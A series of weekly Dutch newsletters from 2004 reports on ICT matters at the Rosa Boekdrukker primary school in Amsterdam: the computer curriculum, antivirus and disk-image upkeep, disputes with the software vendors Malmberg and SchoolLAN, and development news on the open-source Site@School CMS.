Het kleutertoetsenbord, waarmee we experimenteren (http://www.myboard.nl) beviel niet in de kleutergroep waar hij de afgelopen maanden was. Er zitten geen functie toesten op (F4 etc.) waarmee een aantal programma's wordt afgesloten of het leerkrachtendeel mee wordt bereikt. Ook als de leerkracht erop wilde typen, sloeg zij overal naast. Het bord gaat nu verder rouleren in onze kleutergroepen. Kandidaten?

Anti Virussoftware

In oktober hebben we een nieuw contract afgesloten met Norton-antivirus software. Maar we hebben nog niks ontvangen, wel een rekening (niet betaald). Regelmatig plegen we een telefoontje naar Utrecht. Maar er zijn problemen bij Symantec, de leverancier van Norton. Per bestelling moet er een licentiecode komen. Die codes druppelen binnen bij het APS. Ondertussen zijn we op een heleboel computers niet meer beveiligd. Als a.s. maandag nog niks binnen is, zeggen we het contract op. We wilden een hele legale oplossing via het APS en dat lukt niet. Zo maken ze het ons wel erg moeilijk… Ook uit de nieuwsgroep horen we serieuze klachten over APS.

Hardware

Schoollan Light

Peter Fokker zette in twee dagen een werkende SchoolLAN Light in elkaar op basis van OpenNA Linux (http://www.openna.com). Daarin ontbraken wel wat functies die schoollan-specifiek zijn, maar het resultaat kan gerust zeer veelbelovend genoemd worden. We hopen dat Schoollan deze versie adopteert.

S@S

Vlak voor het oude jaar is versie 2 gelanceerd, geheel volgens de planning. Vervolgens hebben we in de vakantie persberichten over de hele wereld gestuurd naar bekende educatieve organisaties en nieuwsgroepen die 'edu' in de naam hebben. We hielden de page hits en download statistieken in de gaten. Meestal hebben we zo'n 100 hits per dag, maar op de dag van uitkomen liep dat aantal op tot 1000! (http://sourceforge.net/project/stats/?group_id=60966) De persberichten hebben gewerkt. En daags na uitkomen was de feature list in 't Frans vertaald en naar de belangrijkste franse educatieve sites verspreid.
We krijgen felicitaties uit binnen- en buitenland en een aantal aanvragen voor gast accounts op de testserver om S@S te kunnen proberen.
In ons forum http://rosaboekdrukker.net/phpBB2/index.php wordt de laatste week weer een flink aantal vragen gesteld.
Hier kun je wat berichten vinden:

Groet en een goed weekend en een net werkend en bugsrijk 2004.
Karin,
Dirk

2004-01-16 w03

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 3- 2004 (16 januari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONDERWIJS

ICT leerlijn

Weer een heel creatieve week in onze ICT leerlijn. In groep 6 is een aantal kinderen begonnen aan de eigen pagina op de website. zie leerlingen>leerling op web (http://rosaboekdrukker.net/index.php?page=54&section=4) Groep 7 is verder gegaan aan de oefening met de kaders rond een pagina. In groep 5 en 8 is begonnen aan een hele leuke oefening: in Paint kan je door een getekend figuurtje uit te knippen het plaatje kopiëren met de knoppen Ctrl-shift. Kijk op de voorpagina van onze website. (rosaboekdrukker.net) Ook vinden er nog steeds klassenconsulten plaats om te zien hoe het toepassen van de ICT leerlijn verloopt. Nog drie groepen moeten bekeken worden. Ook zijn op het ABC de opdrachten voor de komende maanden vastgesteld. Er gaat weer ge-emaild worden, deze keer niet met een andere basisschool (berenproject) maar met een zogenaamde redactie. Nader nieuws volgt.

Letterpret en Malmberg

Deze week kreeg onze directeur een telefoontje van een directeur van Malmberg. Naar aanleiding van al onze klachten wil hij met ons komen praten. Eindelijk! We hebben een oproep in 3 Nederlandse nieuwsgroepen geplaatst om ervaringen met Malmberg's educatieve software te verzamelen. De reacties stromen binnen. Vooral één, van een aantal ICT ouders van een school in Rijswijk, springt er uit. De ouders zijn 'zwaargewichten' in ICT-land en kwamen met diepspittende opmerkingen. Zeer bedankt! Een eerste indruk:
- De klachten betreffen meerdere programma's van Malmberg
- De klachten komen van scholen die Windows en Linux servers gebruiken. Het lijkt dus geen 'Linux-probleem'.
- De klachten lijken te wijzen op ontoereikende netwerkfunctionaliteit. Vermoedelijke oorzaken: slecht ontworpen en onvoldoende geteste software. - Dirk is wel een tovenaarsleerling, maar niet gek.

Voorlichting Ouders

In de ouderkamer heeft Karin deze week verteld over het ICT onderwijs op onze school. Er waren 21 moeders en een heleboel kleine kinderen. Er is uitgelegd wat er op de computers wordt gedaan en dat er een  ICT leerlijn is van groep 1 t/m 8. Ook is er gepraat over de gevaren van het Internet. Steeds meer kinderen hebben thuis ook toegang tot het internet en de ouders weten onvoldoende wat zich daar zoal afspeelt. Moeders vroegen of ze ook op computerles konden. Daarover gaan we ons nu beraden: kan dat gecombineerd worden met de basiseducatie?

Nieuws.

Groot nieuws! Agnes is sinds deze week thuis online. Gefeliciteerd Agnes ! Slecht nieuws: Ronald kan thuis nog steeds niet surfen naar http://rosaboekdrukker.net. Zit de fout bij hem of bij UPC?


TECHNIEK

NORTON ANTI VIRUS

De licentiecodes zijn binnen. En nu op de deadline van deze nieuwsbrief wordt per speciale pakketpost ook de software geleverd. Dus a.s. maandag zijn we weer beveiligd!


IMAGE

We zijn het image van de 40 leerlingcomputers aan het bijwerken. De Acrobat Reader versie 6 zit er op en binnenkort de nieuwe virusscanner. Dan moeten er nog een paar printers bij en kunnen we computers gaan verversen. Doen we met Ghost for Unix (even Googelen).

OPENNA

Dirk heeft thuis zijn server met OpenNA Linux (http://www.openna.com) draaiend en verdiept zich in de toekomst van onze servers met dit systeem. Zowel hij als Peter vinden het een zeer goed fundament voor SchoolLAN.

BEDRIJFSUITJE

Fred en Dirk bezochten de nieuwjaarsreceptie van de Nederlandse Linux Gebruikers Groep. Leuk om wat mensen te ontmoeten die we van de nieuwsgroepen kennen. Zie ook bij 'Cor'.

SITE@SCHOOL NIEUWS

Cor bood aan om S@S op veiligheid te controleren. Zeer bedankt Cor! Zeker nu we er ook een intranet in hebben is dat geen overbodige luxe.

We hebben als proef op de site een progje draaien waarmee roosterwijzigingen en mededelingen scrollend kunnen worden weergegeven. Zie bijvoorbeeld: http://rosaboekdrukker.net/rooster.php?page=33&speed=3 Als e.e.a. je te snel voorbijkomt, doe dan speed=1. De volgende stap in de proef is een computer met een composiet video uitgang en een TV in de hal. Voordeel: mededelingen kunnen via 't CMS online gezet worden.

Rob gaat een kalender module coden. Fred gaat binnenkort de agenda module afmaken. Sneak preview op http://wyxs.net/agenda/agenda.php en het manual (ook incompleet): http://wyxs.net/man2/fagenda.html

Groet en goed weekend,
Karin,
Dirk.

2004-01-23 w04

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 -week 4- 2004 (23 januari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONDERWIJS

Vandalisme in map van leerling

Een leerling uit groep 7/8 meldt, dat iemand obscene taal in haar documenten gezet heeft. De leerling besloot te doen wat haar het beste leek en heeft alles opgeruimd. Gelukkig hebben we backups en kunnen we komende week proberen e.e.a. te achterhalen. De documenten van de leerlingen in een groep zijn voor alle leerlingen in die groep bereikbaar. Ze moeten leren om van elkaars spullen af te blijven. Regels van goed fatsoen gelden ook hier. Het is de eerste keer in ....... jaar dat dit gebeurt; we houden het er voorlopig op dat onze regels en het toezicht daarop goed zijn.

Begeleiden groepen

Karin's assistentie is nog steeds nodig in een aantal groepen, om de afgesproken doelen te bereiken. Dat is niet de bedoeling en het verstoort Karin's werkplanning. Leerkrachten zouden onderhand in staat moeten zijn zelf hun groepen te begeleiden in de ICT vaardigheden. Naar aanleiding van de klassenconsulten van Monique zal er op de ICT-evaluatiemiddag op 5 februari ingegaan worden op de nog aanwezige organisatorische problemen. Waarom lukt het sommige leerkrachten (nog) niet of niet goed om de afgesproken ICT leerlijn te volgen in de groep? En waarom lukt het de meesten wel?

ICT Leerlijn

We hadden beloofd meer over de leerlijn voor de komende periode bekend te maken. De leerlijn is vorige week vastgesteld. Details volgen volgende week.

Letterpret/Malmberg

A.s. dinsdag komt er een directeur van Malmberg met ons praten over de problemen die we met Letterpret hebben. We hebben ondertussen al van heel veel mensen punten van kritiek ontvangen. Die hele waslijst nemen we mee in het gesprek, inclusief een dossier aan emails aan de helpdesk en een calculatie van tijd die we kwijt zijn geweest om het programma te installeren. De ingekomen klachten kun je vinden op http://wyxs.net/malmberg/malmberg.htm

Leerlingpagina's

Deze week hebben weer een paar kinderen een eigen pagina gekregen. Kijk bij http://rosaboekdrukker.net/index.php?page=54&section=4 Leerlingen die thuis internet hebben kunnen er thuis aan werken, andere kinderen kunnen het op school doen. Spannend hoe gaat lopen.

Kleurenprinter

We hebben de afgelopen tijd gemerkt, dat het heel prettig zou zijn, als we een kleurenprinter in school zouden hebben die meer kwaliteit kan leveren dan de zeer eenvoudige inktjet printer die we nu hebben. We zijn (weer via de nieuwsgroepen) op onderzoek gegaan naar een deugdelijk apparaat. Heeft iemand nog een suggestie? Welkom!

Norton Anti Virus

Het nieuwe programma is vorige week binnengekomen en Dirk heeft het geïnstalleerd op één image. De overige computers moeten nog.

TECHNIEK

S@S statistieken

http://rosaboekdrukker.net/index.php?page=554&section=6 Bij sourceforge wordt bijgehouden hoe vaak een programma bekeken en gedownload wordt. Eind december heeft Dirk wereldwijd reclame gemaakt voor de nieuwe release van S@S in de nieuwsgroepen. Karin heeft daarna allerlei Nederlandse sites en e-zines aangeschreven met een persbericht. De effecten van die inspanningen zijn in de grafiek te lezen. De tijdschriften die nog geen aandacht aan het programma hebben besteed zullen nog een keer worden aangeschreven. Korte samenvatting van de statistieken: Als jullie dit lezen bestaat Site@School 515 dagen, heeft het in die tijd 73.000 hits gehad en 5540 downloads. Gemiddeld komt dat neer op 140 hits en 10 downloads per dag.

Weer een school met S@S

Deze week ontvingen we het bericht, dat er weer een school enthousiast is over S@S. http://www.loysderhoek.nl Neem een kijkje op de site!

S@S modules

De agenda module vordert gestaag en een kalender module is onderweg via Marinus van de Loyserhoek die er één maakte. Van Engeland tot Nieuw Zeeland is er belangstelling voor. De vernieuwde nieuwsmodule doorloopt de laatste tests.

Image

Dirk is deze week weer bezig geweest om het nieuwe image te maken voor de 40 leerlingcomputers. Met een image kunnen de 40 computers zeer snel up to date worden gemaakt. Dat scheelt dus heel veel tijd. Elke keer, als we denken, dat het image klaar is, bedenken we weer iets, dat we zijn vergeten. Zo was er een ikoontje op het bureaublad van het rekenweb van het Freudenthalinstituut niet goed. We konden het ikoontje niet vinden en hebben toen een programmaatje gedownload, 'Any to Icon' (even googelen) dat van een willekeurig plaatje een ikoon kon maken. Ook heeft Dirk het probleem van NORMAL.DOT opgelost. Normal.dot is het sjabloon dat Word standaard gebruikt. Als leerlingen andere fonts gebruiken dan de standaardfonts komt Word telkens met een melding dat normal.dot beschadigd is. Vervelend. Door normal.dot alleen lezen te maken is het probleem opgelost (hopen we...). Wat ons opvalt is dat het veel moeite en energie kost om een _echt_ goed image te maken. Het nieuwe image is nu klaar, denken we. Testen wijst uit dat we binnen 10 minuten een schone installatie op een computer kunnen hebben.

COMUTER GEKREGEN EN WEER UITGEZET

We kregen van de oud wethouder Steeman een computer; een prima apparaat. Op dit moment hebben we geen emplooi voor 1 computer, maar we hadden 't nog niet gezegd of Maarten (leerkracht en Medezeggenschapsraadslid) kwam langs en vroeg of we nog een computer voor de secretaris hadden. Ja dus. Iedereen blij.

Tot zover, groeten en prettig weekend,
Karin,
Dirk

2004-01-30 w05

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 5- 2004 (30 januari)
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONDERWIJS

Letterpret  Malmberg

De kogel ging door de kerk. Er kwam een directeur van Malmberg om over onze  problemen met Letterpret te praten. Malmberg is bereid om te helpen de problemen op te lossen. Voor de krokusvakantie zal er een nieuwe manier van installeren zijn. Onder andere zal de diskette met de beveiligingscode afgeschaft worden, waardoor het gemakkelijker wordt om problemen te verhelpen. Dus…..als alles goed gaat, zal Letterpret na de krokusvakantie eindelijk goed gebruikt kunnen gaan worden. Zie ook bij techniek.

Computerstoel

Deze week hebben twee stoelen aangeschaft om te kijken of de kinderen daarop beter achter de computer kunnen zitten. De zittingen kunnen erg hoog. Bovendien zit er een (in hoogte verstelbare) ring om de middenpoot waarop de kinderen met te korte benen hun voeten kunnen steunen. Zie de foto. Als de proef met de stoelen slaagt en ze bevallen, hebben we eindelijk goede computerwerkplekken! Eerste nadeel (tje?). De veer in de stoel is zo sterk dat het gewicht van een kind niet genoeg is om de stoel lager te krijgen.

Computertafels

Aanstaande dinsdag komt onze smid op school. We gaan bekijken of hij tafels kan maken die aan onze wensen voldoen. Een tafel die we zoeken kost in de onderwijshandel wel 360 euri en 7 tafels op maat zijn wellicht goedkoper. We zoeken tafels van 2 meter breed en 75 cm diep. Er moeten twee computers op passen zodat er twee kinderen naast elkaar aan kunnen werken.

Zo, de computerstoelen en -tafels zijn klaar, nu de computerbedden…

ICT leerlijn

Volgende week donderdag is er voor het hele team een evaluatie middag. We bekijken dan of de afgesproken doelen bereikt zijn, waar mensen tegenaan gelopen zijn en waar er nog wat te verbeteren valt. We zijn de leerlijn aan het vaststellen, dus kan er ook aan bijgesteld worden. Deze week is er een klassenconsult in groep 7 geweest. In groep 5 hebben nu alle leerlingen een eigen pagina. Omdat er nog geen opdracht gegeven is wat er op gepubliceerd moet worden, komen er nu vooral nog veel plaatjes van pop-idolen op. Maar dit draagt natuurlijk wel bij tot het omgaan met het programma. Groepsleerkrachten krijgen emails thuis, als leerlingen iets hebben gewijzigd aan hun pagina´s. Op die manier kan gecontroleerd worden, wat erop gezet is. Van “I'm a hotty girl” tot “ik regel meisjes”. Er valt nog veel op te voeden!! In groep 5 zijn de leerlingen als voorbereiding op het maken van werkstukken aan het leren hoe je informatie uit een tekst haalt. Deze week is gebruik gemaakt van het blad TamTam (wereld natuurfonds). Daar waren 4 bladzijden gewijd aan de giraf. Elk kind heeft een weettekst in het verhaaltjesschrift geschreven. Er is ook een begin gemaakt met het rechtstreeks typen in de leerlingpagina van die tekst. Zie bij Jeroen: klik hier

Voordracht EFA

Karin heeft donderdagmiddag aan de EFA (Educatieve Faculteit Amsterdam, de 'PABO') tijdens een bijeenkomst voor docenten verteld over het ICT onderwijs bij ons op school en met name over de totstandkoming van de ICT leerlijn. Ook heeft zij de docenten van de EFA opgeroepen bij hun onderwijs aan pabo studenten aandacht te besteden aan de organisatie van de lessen: hoe kunnen computers op een geïntegreerde wijze ingezet worden? Hoe organiseer je je lessen zó dat er tijd over blijft voor zelfstandig werk? Tijd waarin aandacht is voor de verwerking in niveaus en remediëring aan de computer. De lezing, met  web- en computerondersteuning, werd door de docenten zeer op prijs gesteld. Veel vragen en informele contacten na afloop. Binnenkort gaat Dirk op de EFA een voordracht houden over s@s. Als er mensen zijn die ook belangstelling hebben voor een voordracht over de ICT leerlijn en/of s@s dan horen wij dat graag.

Problemen in mappen

In één groep is door een vandaal rond 12 december gerommeld aan de naamgeving van de mappen van leerlingen. Dat is in de back-ups te zien. Niet in de mappen van vandaag. Vreemd. We gaan uitzoeken en in de gaten houden wat er gebeurt. Jammer, dat we ons nu ook met dit soort kwalijke zaken moeten gaan bezighouden.

TECHNIEK

Letterpret

Peter Fokker heeft zijn expertise op Letterpret losgelaten. Als het installerprobleem door Malmberg uit de wereld is geholpen heb je geen licentiediskette meer nodig. De problemen die dan overblijven (permissies, databaselocks) kunnen vrijwel zeker met goede samba-instellingen en een paar workarounds verholpen worden.

SITE@SCHOOL NIEUWS

Agenda

De agenda, http://wyxs.net/agenda/agenda.php nadert qua werking zijn voltooiing. Een enkel bugje nog: dit jaar mogen we 29 februari beleven, de kalender twijfelt tussen 29 februari en 1 maart).  De configuratie-interface moet nog gemaakt worden. Je mag je zo langzamerhand gaan aanmelden als tester. Voor de tester die de meeste bugs vindt is er een mooie prijs…

Kalender

We kregen van Marinus de kalendercode. Daar moet nog wel het nodige aan gebeuren, want hij had het nogal 'quick and dirty' in elkaar gezet.

Scholen op S@S

De Arnhemsche Montessorischool gaat ook op S@S . Ze hebben een tijdje een account op de testserver gehad, hebben erover vergaderd en besloten. Weer een school.

S@S Internationaal.

We kregen bericht van iemand die de Finse vertaling doet en een Canadees die het manual (de handleiding) in het Frans wil vertalen.

Versie 2.1 Beta klaar!

En het laatste nieuws: Versie 2.1 beta kan vanaf nu gedownload worden: http://wyxs.net/links/aclink.php?id=15
LET OP: dit is een testversie bedoeld voor testers. Niet zomaar op je schoolsite installeren!! Wil je meehelpen testen? Daar zou je vele scholen mee helpen. De testperiode is tot 1 maart a.s.  Bugs kun je rapporteren op het S@S4US  Forum. Fred haalt de bugs eruit en we zetten meteen een nieuwe versie klaar. Zeer bedankt voor je medewerking. Je helpt scholen wereldwijd.

Groet en goed weekend,
Karin,
Dirk

2004-02-06 w06

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 2 - week 6- 2004 (6 februari 2004)
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Dit keer een lange BIC. Het kan niet anders.

ONDERWIJS

Tafels

Deze week kwam de smid langs om te bekijken wat voor tafels hij voor ons kan maken. Zijn bestaande tafels voor computers goedkoper dan tafels die hij kan maken? We zoeken het uit. In ieder geval gaat hij een beugel maken om Gerda's computer, die nu op de grond staat, onder haar bureau te bevestigen.

ICT evaluatie middag.

We hebben deze week een hele middag met het team geëvalueerd hoe het met de ict-leerlijn staat. Hoe is het gegaan, wat ging er goed, wat ging er minder en waar gaan we op letten? Conclusie: de afgesproken doelen zijn grotendeels behaald door de leerlingen. De afgesproken oefeningen zijn gedaan. Het peil van de leerlingen is weer behoorlijk gestegen. Maar aan de organisatie valt nog wat te doen: het aanleren van vaardigheden is nu nog afhankelijk van het hebben van halve groepen en van ondersteuning van extra leerkrachten. We gaan vol goede moed door om ervoor te zorgen, dat computers binnen ons onderwijs een middel zijn en geen doel.

Aardrijkskunde nieuwsbrief

Er is weer een aardrijkskunde nieuwsbrief binnen. Hoort bij onze methode De Wereld Dichtbij. De internetopdrachten die worden geboden zijn niet erg uitdagend. Zie: hier

Google Toolbar.

Als je veel gebruik maakt van Google is het handig om de toolbar te downloaden. www.toolbar.google.com. In de laatste versie zit ook een pop-up killer. (dat zijn van die lastige reclame schermpjes die zo opeens in beeld schieten)

TECHNIEK

Images

In het weekend heeft Dirk de computers op de eerste verdieping met het nieuwe image opnieuw geïnstalleerd. We ontdekken steeds weer nieuwe instellingen. Zo brult Windows, als je een wachtwoord intikt op het internet: zal ik dit wachtwoord onthouden? Snelle kindervingertjes drukker op enter en dan zou een andere leerling kunnen inloggen op de leerling pagina van een ander. Dus op de volgende image is dat ook weer ingesteld. Het vervangen van 10 images op 10 computers, inclusief instellen IP adres en  computernaam kostte 1uur. Leve Ghost for Unix!

S@S nieuws

Groot nieuws: Gerard Roos gaat de Nederlandse handleiding maken. Welkom Gerard!

Sinds we de nieuwe versie (2.1 beta) als testversie aanboden stromen de testrapporten binnen op het S@S forum. Deze week hebben we de Finse vertaling binnen van S@S. Hij komt van een schoolhoofd dat binnenkort IT voor basisscholen  gaat doceren op een universiteit in Finland. Dat belooft een goede toekomst voor S@s in het land van Linus Thorvald (de founding father van Linux).

Compaq server

Basisschool de Ark in Heemskerk heeft één van de servers die wij van een gemeentelijke dienst kregen. Ze zijn er zeer tevreden mee. Er zit Linux (Suse) op, met Samba, en sinds ze 'm hebben draait Ambrasoft probleemloos.

Virus update

De computers in het kantoor zijn voorzien van de nieuwe virusscanner met auto-update (Norton).

Gesprek met Joop Westerweelschool over Linux en SchoolLAN

Dirk had een lang gesprek met Carol Moes van de Joop Westerweel school in ons stadsdeel. We hadden het over de ICT ervaringen van de Rosa Boekdrukker in de afgelopen jaren. Carol had het idee er dankbaar gebruik van te kunnen maken bij de opzet en inrichting van ICT op de Joop Westerweel. Ook kwam de vraag naar onze ervaringen met SchoolLAN ter tafel. Die ervaringen  zijn niet positief. Wij hebben vrijwel besloten niet verder in zee te gaan met de Stichting SchoolLAN. Uiteraard wilde Carol weten hoe e.e.a. in elkaar stak.

In de voorjaarsvakantie van 2003 zou Stichting SchoolLAN een server bij ons installeren, compleet met een aantal educatieve software pakketten. De installatie zou drie dagen duren en er was een gefaseerde aanpak afgesproken.

De installatie was een chaotisch, ongestructureerd proces dat na drie dagen installeren een gedeeltelijk werkende server heeft opgeleverd. Hij werkte op ter plekke gemodificeerde installatiescripts, een startup melding die ontbrak en ter plaatse verzonnen patches en tweaks. Het was geen reproduceerbare standaardinstallatie van een server die volgens bepaalde specificaties gebouwd was. De server was een ter plekke geconstrueerd exemplaar, dat hooguit als experimentele server dienst zou kunnen doen. Van migratie van onze bestaande server naar de SchoolLAN server kon geen sprake zijn. Een bevriend expert die bij de installatie aanwezig was noemde het installatieproces 'amateuristisch' en kon dat goed onderbouwen.

De directie besloot de installatie niet te betalen en Stichting SchoolLAN bood aan om de server in de zomervakantie opnieuw te installeren. De school wees dat aanbod af met als argument: "Er mankeert zoveel aan de installatie, dat krijgen jullie voor de zomervakantie niet  in orde".

Na deze afgang  heeft Dirk nog een bespreking met Stichting SchoolLAN gehad en alle bezwaren op een rijtje gezet. Grootste bezwaar: Qua concept deugt de server niet. Daarnaast bood hij een denkrichting aan voor een alternatief dat op korte termijn mogelijk een oplossing voor de problemen zou zijn: SchoolLAN Light. We zouden er nog van horen, en na de zomer zou de nieuwe versie van SchoolLAN uitkomen. Volgens de website van schoolLAN is de release een paar keer uitgesteld en is het 'nog even wachten'. Sinds de zomervakantie is er geen duidelijkheid over een release datum. Wij zijn het wachten meer dan zat. We hebben ook een duidelijk alternatief voor de ons inziens wankele basis van SchoolLAN aangeboden, maar daar is door SchoolLAN niet op gereageerd. Dirk heeft persoonlijk zijn bezorgdheid bij het bestuur geuit, maar kreeg weinig respons. Het concrete alternatief is: OpenNA Linux, uitgebreid met een paar SchoolLAN specifieke tools.

Een jaar lang hebben wij onze kritiek op schoolLAN nooit in deze nieuwsbrief of in de nieuwsgroepen geuit, in afwachting van een goedwerkende versie, waarmee ons beheerprobleem ook opgelost zou worden. We vinden dat nu het moment is aangebroken om onze kritiek openlijk in deze nieuwsbrief te uiten. Daarmee geven we tevens aan, dat we op zoek gaan naar een ander samenwerkingsverband om te komen tot een OSS/GPL server. We zijn zwaar teleurgesteld, dat het veelbelovende concept van SchoolLAN (waar we nog steeds achter staan) op niets is uitgelopen door de krakkemikkige installatie van hun server.

Goed weekend,
Karin,
Dirk.

PS: Eindelijk hebben we ontdekt waar het woord SPAM vandaan komt: goedkoop, ingeblikt varkensvlees dat soldaten in de 1e Wereldoorlog aten (SPiced AM).

2004-02-13 w07

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 7 2003 (13 februari)
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONDERWIJS

Letterpret Deze week kregen we keurig op de afgesproken tijd bericht van Malmberg over Letterpret. Volgende week komt de verbeterde installer, waardoor het eindelijk gemakkelijk geïnstalleerd kan worden. Hopelijk is er volgende week reden om te tracteren.

Cameraproblemen

Ons fotocameraatje vertoont kuren. Qua functionaliteit bevalt onze Canon A60 powershot prima, maar het ding behoeft wel een stevig omhulsel (hardplastic tas, o.i.d.). Je kunt heb beslist niet los in je aktentas stoppen, tezamen met mascara, lippenstift, een lader met harde uitstekende punten, etc. Na wat maanden is de camera beschadigd en geeft af en toe storingen. Gelukkig was ie niet heel duur. We hebben een nieuwe besteld.

Rooster computergebruik 1e en 2e verdieping

De groepen staan af en toe te dringen om aan hun opdrachten te werken. Daardoor is het noodzakelijk een rooster te maken voor de computers die in de hallen staan.
Graag invullen (vakje Koen).

Images maken

We zijn nu een image aan het maken voor 6 computers die in groep 3, 4 en 5 gebruikt worden. Dat is weer een hoop werk. We hebben ook nog een setje van 6 computers in het kantoor waar ook nog een image voor moet komen. Verder hebben we nog een stuk of 5 computers die unieke exemplaren zijn omdat we die een aantal jaren geleden per stuk kochten. Tijd om ze af te stoten en te vervangen voor identieke? Advies: koop al je computers in één keer en zorg dat ze allemaal hetzelfde zijn.

Programma´s op de server

Er wordt niet vaak een nieuw programma op de server gezet. Maar nu moeten er opeens twee op: één voor bevo (kleuren speuren) en de cd-rom van Anne Frank.

TECHNISCH

S@S forum

Het forum wordt steeds meer gebruikt. En omdat het Forum mailt naar Fred, Karin en Dirk als iemand iets post, krijgen mensen snel antwoord. We krijgen er regelmatig complimentjes over. Er zijn mensen geregistreerd als "member" van Karachi tot en met Christchurch. (zie hier)

Gerard Roos (die de Nederlandse handleiding maakt) installeert S@S op twee hele kleine schooltjes op Terschelling. Daar heeft één leerkracht wel drie groepen. Die faciliteit was nog niet beschikbaar in S@S. Wat al wel kon was dat meerdere leerkrachten gezamenlijk één groep konden hebben.
Eerst zag Fred geen eenvoudige oplossing om dit in het systeem te programmeren, maar hij kreeg een superbrainwave! GELUKT!! S@S is een belangrijk feature rijker. Kijk eens op http://siteatschool.sourceforge.net naar de nieuwe features in versie 2.1

Agenda

De agenda nadert zijn voltooiing. Je kunt nu alle kleuren instellen en agenda's toevoegen. We lieten 'm aan iemand zien die zei: "Het lijkt wel een analoge agenda".
Een groot compliment, vinden we. In alle bescheidenheid denken we dat de agenda een hit gaat worden.

Statistieken

S@S bestaat nu 536 dagen, heeft nu ruim 75.000 hits en bijna 6000 downloads. Neem een kijkje en trek je eigen conclusies… De testversie is 52 keer gedownload.

2004-02-20 w08

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 8 2004 (20 februari)
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONDERWIJS

Bezoek ICT coördinator 2e Dalton

Deze week kwam de ICT coördinator van de tweede Dalton zijn licht opsteken bij ons op school. Ook op zijn school gaat het erom: hoe integreer je de computers in het onderwijs.
Is het een idee om je "succesverhalen" uit te wisselen met andere scholen? Misschien moet het stadsdeel-ICT coördinatorenoverleg wel wat breder: De ICT-succes-club.
Vraag aan jullie: Wij zouden zo graag eens een school bezoeken die op het gebied van ICT en integratie verder is dan wij. Welke school meldt zich?

Werkstukken zoek geraakt

Een aantal leerlingen uit groep 7 was hun werkstuk kwijt. Het bleek dat één leerling het in een submap had opgeslagen. Door een zoek actie van Dirk in de LINUX server kwam het document terug. Een ander kind had het opgeslagen onder een onduidelijke naam. Een derde kind heeft iets anders (niet duidelijk) gedaan en is het opnieuw gaan tikken. Het blijft toch een kwestie van vaker doen. Dan maak je dat soort fouten niet meer.

Foute sites.

We hebben ontdekt, dat er kinderen zeer verkeerd zijn bezig geweest op de tweede verdieping op het internet. Volgende week hoort u hier meer over!

Anne Frank.

De cd-rom is nog niet aan de praat gekregen op de server. Ook onze Linux CD Jukebox krijgt 'm niet aan de praat. Wij maken van cd's images die de clients via de automounter en Samba kunnen afspelen.
(Zie Linux Journal van april 2002).

Norton Anti Virus.

We hebben ontdekt, dat het toch mogelijk is om op de nieuwe versie in te stellen hoe er wordt ge-update. We dachten dat het automatisch ging. We hadden de juiste knop voor het instellen nog niet kunnen vinden. Waarom zijn die versies zo verschillend? Elke keer moeten we zowat weer een cursus volgen om een nieuwe versie van dezelfde sofware te leren bedienen. Het lijkt wel Windows.

USB Stick

Dankzij een zij-instromer heeft de USB stick zijn intree op school gedaan. Een Windows98SE drivertje was zo op internet gevonden. Nu kan groep 7 volgende week de geschiedenisopdracht "zwerftocht op het internet"doen.

TECHNIEK

Images

De computers op de tweede verdieping worden deze week van nieuwe images voorzien. De netwerkprinter die nu bij de klas van Thea staat werkt dan ook voor de 6 computers in de hal en Thea haar klas.

S@S nieuws.

De agenda is klaar! We gaan 'm binnenkort installeren en we hebben er hoge verwachtingen van.

Versie 2.1 begint 'ergens op te lijken'. Bug reports van de testers komen binnen en worden langzamerhand schaarser. We beginnen er vertrouwen in te krijgen. Kijk even in het nieuws op http://siteatschool.sourceforge.net , daar staan de laatstbijgekomen features.

2004-02-27 w09

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 9- 2004 (27 februari)
Wat is er de ze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ONDERWIJS

Onze Taal

1. Voor het eerst sinds de Tweede Wereldoorlog is er een nieuw teken aan het morsealfabet toegevoegd: het apenstaartje.
Bron: CJ Online, onze taal.
Omdat wij ook voor de talloze lezers die nog morse gebruiken actueel willen zijn geven we hier de tekens. Het is een combinatie van  A en C zonder spatie, dus ".--.-.". En voor de techno freaks herhalen we 't nog even bij techniek.. 

2. Taaltip: 'op (het) internet'
'Op internet' en 'op het internet' zijn beide mogelijk, net als 'op televisie' en 'op de televisie'. Vroeger werd 'internet' als eigennaam gebruikt en bleef het lidwoord meestal achterwege. Tegenwoordig fungeert het als een soortnaam en wordt het vaak met het lidwoord 'het' gecombineerd.
Overigens adviseren de meeste hedendaagse woordenboeken om 'internet' met een kleine letter te schrijven, evenals samenstellingen met dit woord: 'internetverbinding', 'internetpagina', enz. Het Groene Boekje (1995) neemt 'internet' niet op; een officiële spelling van dit woord is er dus (nog) niet.
(bron: www.onzetaal.nl

Klokhuis agenda staat op de site.

Elke dag zijn er interessante onderwerpen voor kinderen, Nederland 3. 18.30 uur. De onderwerpen staat voor de komende weken al genoteerd. Kijk hier

ZELFTEST

Naar aanleiding van wat voorvallen op het internet bij ons op school wordt verwezen naar de volgende test. Hiermee kunt u uw keneis over het internet testen.

